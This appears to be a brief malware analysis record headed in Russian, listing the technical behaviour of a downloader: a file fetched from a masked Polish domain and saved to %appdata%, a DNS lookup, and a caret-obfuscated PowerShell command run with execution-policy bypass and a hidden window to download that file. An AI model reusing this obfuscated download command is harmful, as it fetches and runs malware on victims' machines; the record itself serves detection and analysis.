Техническая информация
- http://lt##.#innerbiz.pl/file/bev.hjn как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OweRshe^LL.exe^ -^E^XECuti^onp^OL^iCy^ b^yP^AsS -NOPr^of^I^LE -win^d^o^W^stylE ^HI^Dden^ (nEW^-OBj^ec^T^ ^sYS^teM.n^ET^.w^EBCLi^E^Nt).dOWNLOAdFI^Le^('http://lt##.#innerbiz.pl/...
- DNS ASK lt##.#innerbiz.pl
- '<SYSTEM32>\cmd.exe' /c "p^OweRshe^LL.exe^ -^E^XECuti^onp^OL^iCy^ b^yP^AsS -NOPr^of^I^LE -win^d^o^W^stylE ^HI^Dden^ (nEW^-OBj^ec^T^ ^sYS^teM.n^ET^.w^EBCLi^E^Nt).dOWNLOAdFI^Le^('http://lt##.#innerbiz.pl/...' (со скрытым окном)